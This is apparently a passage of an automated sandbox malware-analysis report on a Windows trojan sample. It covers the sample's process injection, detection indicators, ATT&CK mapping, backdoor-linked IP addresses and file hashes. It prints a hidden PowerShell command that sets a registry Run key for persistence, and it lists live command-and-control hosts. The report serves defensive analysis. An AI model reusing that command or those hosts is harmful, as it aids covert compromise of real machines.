    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: d3dcompiler_47.dll
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winmm.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: powrprof.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: umpdc.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: textshaping.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: textinputframework.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: coreuicomponents.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wintypes.dll
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: BwqqVoHR71.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
    Source: BwqqVoHR71.exe | Static file information: File size 19172088 > 1048576
    Source: BwqqVoHR71.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4dca00
    Source: BwqqVoHR71.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xc87e00
    Source: BwqqVoHR71.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmp

    Data Obfuscation

    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
    Source: BwqqVoHR71.exe | Static PE information: section name: .symtab

    Boot Survival

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run App
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1972
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1407
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808; Thread sleep count: 1972 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796; Thread sleep count: 1407 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840; Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828; Thread sleep time: -1844674407370954s >= -30000s
    Source: BwqqVoHR71.exe, 00000000.00000002.1996444537.0000000001FAE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
    Source: BitLockerToGo.exe, 00000005.00000002.3048388496.0000000002F28000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 23D008
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8CC000
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: B78000
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: BDB000
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: BDC000
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: C0A000
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\windows\bitlockerdiscoveryvolumecontents\bitlockertogo.exe\" }"
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Queries volume information: C:\Windows VolumeInformation
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Queries volume information: C:\Windows\AppReadiness VolumeInformation
    Source: C:\Users\user\Desktop\BwqqVoHR71.exe; Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe; Queries volume information: C:\Users\user\AppData\Local\config VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

    Stealing of Sensitive Information

    Source: Yara match; File source: Process Memory Space: BitLockerToGo.exe PID: 7652, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match; File source: Process Memory Space: BitLockerToGo.exe PID: 7652, type: MEMORYSTR
    MITRE ATT&CK Matrix

    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Command and Scripting Interpreter | 11 Registry Run Keys / Startup Folder | 311 Process Injection | 1 Masquerading | 21 Input Capture | 1 Security Software Discovery | Remote Services | 21 Input Capture | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | 1 PowerShell | 1 DLL Side-Loading | 11 Registry Run Keys / Startup Folder | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 311 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Proxy | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 11 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Source | Detection | Scanner | Label
    BwqqVoHR71.exe | 29% | ReversingLabs |
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
    http://crl.microsoft | 0% | URL Reputation | safe
    https://contoso.com/License | 0% | URL Reputation | safe
    https://contoso.com/Icon | 0% | URL Reputation | safe
    https://www.certum.pl/CPS0 | 0% | URL Reputation | safe
    http://subca.ocsp-certum.com02 | 0% | URL Reputation | safe
    https://contoso.com/ | 0% | URL Reputation | safe
    https://nuget.org/nuget.exe | 0% | URL Reputation | safe
    http://crl.certum.pl/ctnca2.crl0l | 0% | URL Reputation | safe
    http://repository.certum.pl/ctnca2.cer09 | 0% | URL Reputation | safe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
    http://www.certum.pl/CPS0 | 0% | URL Reputation | safe
    No contacted domains info
    Name | Malicious | Antivirus Detection | Reputation
    http://93.185.159.253/ | false | | unknown
    http://188.130.206.243/ | false | | unknown
    http://46.8.232.106/ | false | | unknown
    http://46.8.236.61/ | false | | unknown
    http://91.212.166.91/ | false | | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://cevcsca2021.ocsp-certum.com07 | BwqqVoHR71.exe | false | | unknown
    http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://picsum.photos/208/500 | BwqqVoHR71.exe | false | | unknown
    http://crl.microsoft | powershell.exe, 00000006.00000002.2006769465.00000000073AB000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    http://188.130.206.243 | BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    https://contoso.com/License | powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://contoso.com/Icon | powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://93.185.159.253 | BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    http://46.8.236.61 | BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w | BwqqVoHR71.exe | false | | unknown
    https://www.certum.pl/CPS0 | BwqqVoHR71.exe | false | URL Reputation: safe | unknown
    http://repository.certum.pl/cevcsca2021.cer0 | BwqqVoHR71.exe | false | | unknown
    https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    http://91.212.166.91 | BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    http://46.8.232.106 | BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    http://188.130.206.243http://46.8.232.106 | BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    http://subca.ocsp-certum.com02 | BwqqVoHR71.exe | false | URL Reputation: safe | unknown
    https://aka.ms/pscore6lBfq | powershell.exe, 00000006.00000002.2002646379.0000000004B21000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
    https://picsum.photos/500/500%02x:%02x:%02x:%02x:%02x:%02x | BwqqVoHR71.exe | false | | unknown
    https://contoso.com/ | powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://crl.certum.pl/ctnca2.crl0l | BwqqVoHR71.exe | false | URL Reputation: safe | unknown
    http://repository.certum.pl/ctnca2.cer09 | BwqqVoHR71.exe | false | URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.2002646379.0000000004B21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.certum.pl/CPS0 | BwqqVoHR71.exe | false | URL Reputation: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
    188.130.206.243 | unknown | Russian Federation | 200509 | SVINT-ASNES | false
    93.185.159.253 | unknown | Russian Federation | 39912 | I3B-AS AT | false
    91.212.166.91 | unknown | United Kingdom | 35819 | MOBILY-AS Etihad Etisalat Company Mobily SA | false
    46.8.236.61 | unknown | Russian Federation | 28917 | FIORD-AS IP-transit operator in Russia Ukraine and Baltics | false
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1537033
                                          Start date and time:2024-10-18 14:01:37 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 18s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:BwqqVoHR71.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:0a21a94198f6157abb36bf55cb43be27.exe
                                          Detection:MAL
                                          Classification:mal84.troj.evad.winEXE@7/3@0/5
                                          EGA Information:Failed
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BitLockerToGo.exe, PID 7652 because there are no executed functions
• Execution Graph export aborted for target BwqqVoHR71.exe, PID 7236 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                          • VT rate limit hit for: BwqqVoHR71.exe
Time | Type | Description
08:03:00 | API Interceptor | 3x Sleep call for process: powershell.exe modified
13:03:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
13:03:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
46.8.232.106 | sV9ElC4fU4.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | antispam_connect1.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | GoogleInstaller.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | GoogleInstaller.exe | malicious | GO Backdoor | 46.8.232.106/
188.130.206.243 | antispam_connect1.exe | malicious | GO Backdoor | 188.130.206.243/
93.185.159.253 | sV9ElC4fU4.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | 5ndBtx7pRX.exe | malicious | GO Backdoor | 93.185.159.253/
93.185.159.253 | GoogleInstaller.exe | malicious | GO Backdoor | 93.185.159.253/
                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SVINT-ASNES | antispam_connect1.exe | malicious | GO Backdoor | 188.130.206.243
SVINT-ASNES | na.elf | malicious | Mirai, Moobot | 188.130.200.140
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | SecuriteInfo.com.Win32.PWSX-gen.31473.14481.exe | malicious | Stealc, Vidar | 46.8.231.109
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | NmN91TzzQT.exe | malicious | Stealc, Vidar | 46.8.231.109
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | mD9WPbCEgK.exe | malicious | Stealc, Vidar | 46.8.231.109
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | sV9ElC4fU4.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | antispam_connect1.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | antispam_connect1.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | 2efOvyn28p.exe | malicious | Stealc, Vidar | 46.8.231.109
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | 20fUAMt5dL.exe | malicious | LummaC, Stealc, Vidar | 46.8.231.109
MOBILY-ASEtihadEtisalatCompanyMobilySA | n5h5BaL8q0.exe | malicious | Sality, XWorm | 46.44.87.100
MOBILY-ASEtihadEtisalatCompanyMobilySA | arm5.elf | malicious | Mirai | 37.243.118.61
MOBILY-ASEtihadEtisalatCompanyMobilySA | arm6.elf | malicious | Unknown | 37.243.118.25
MOBILY-ASEtihadEtisalatCompanyMobilySA | mips.elf | malicious | Mirai | 178.81.128.81
MOBILY-ASEtihadEtisalatCompanyMobilySA | sparc.elf | malicious | Mirai | 178.81.128.55
MOBILY-ASEtihadEtisalatCompanyMobilySA | m68k.elf | malicious | Unknown | 5.110.196.213
MOBILY-ASEtihadEtisalatCompanyMobilySA | na.elf | malicious | Mirai | 5.108.208.202
MOBILY-ASEtihadEtisalatCompanyMobilySA | na.elf | malicious | Mirai | 176.224.147.87
MOBILY-ASEtihadEtisalatCompanyMobilySA | na.elf | malicious | Mirai | 178.81.128.75
MOBILY-ASEtihadEtisalatCompanyMobilySA | na.elf | malicious | Mirai | 37.243.118.66
I3B-ASAT | botnet.x86.elf | malicious | Mirai, Moobot | 78.142.85.12
I3B-ASAT | sV9ElC4fU4.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | antispam_connect1.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | wa_3rd_party_host_32.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | 3wtD2jXnxy.exe | malicious | RedLine, STRRAT | 93.185.156.125
I3B-ASAT | 5ndBtx7pRX.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | 5ndBtx7pRX.exe | malicious | GO Backdoor | 93.185.159.253
I3B-ASAT | GoogleInstaller.exe | malicious | GO Backdoor | 93.185.159.253
                                          No context
                                          No context
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1264
                                          Entropy (8bit):5.382376269983977
                                          Encrypted:false
                                          SSDEEP:24:3F5WSKco4KmM6GjKbmOIl+mZ9tYs4RPQoUGt/NK3R8O9rr:/WSU4Yym/+mZ9tz4RIoUeNWR8Gf
                                          MD5:185B6300C3F71D6831783E629F9528C7
                                          SHA1:D79BE4DF79B6A4E4C6A38350666B7B77046E7036
                                          SHA-256:E92AC4B6E0F60234C7AA058CD2D4C171EDA93B94D924D32D9708BFEACFB57A60
                                          SHA-512:F22282FD51C1F3A8F7149C527C9EC7FD07818B8B7F55F255B0A2DB574ADA2D334395E06C22104DA6DB3CBBB52CFD1D0774D3E47B05E199CB2D0C2F0E17122A1B
                                          Malicious:false
                                          Reputation:low
